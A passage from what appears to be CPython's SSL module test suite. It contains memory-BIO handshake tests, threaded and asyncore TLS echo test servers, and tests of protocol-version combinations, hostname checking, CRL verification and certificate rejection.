ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
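# Drive the TLS handshake through an SSLObject and a pair of MemoryBIOs;
# the TCP socket only carries the ciphertext that ssl_io_loop() shuttles
# between the BIOs and the network.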
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
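# A TLS echo server running in its own thread. Each accepted connection is
# handled by a ConnectionHandler which (optionally only after a STARTTLS
# exchange) wraps the socket with the server's SSLContext and echoes data
# back lowercased. Negotiated protocols, shared ciphers and handshake
# errors are recorded so the tests can inspect them.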
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
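# Upgrade the accepted plaintext socket to TLS. On handshake failure the
# error is recorded and the server is shut down; on success the negotiated
# NPN/ALPN protocols and shared ciphers are recorded on the server.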
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
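# Echo loop implementing the tests' tiny protocol: an empty read means EOF
# (unwrap and close), b'over' closes the connection, b'STARTTLS'/b'ENDTLS'
# switch TLS on and off when the server allows it, b'CB tls-unique' replies
# with the channel-binding data, and anything else is echoed back lowercased.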
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# This server is based on asyncore.dispatcher rather than threads: each
# accepted connection performs a non-blocking SSL handshake and then
# echoes data back lowercased.
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
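# Data may already be buffered inside the SSL layer; drain it here,
# since select() on the underlying socket will not report it.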
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
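# Try to complete the non-blocking handshake: WantRead/WantWrite simply
# mean more I/O is needed, EOF or ECONNABORTED mean the peer went away,
# and any other SSL error is propagated.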
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes. Return a dict with statistics about the connection
(cipher, compression, peer certificate, selected ALPN/NPN protocols,
TLS version, and session information).
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
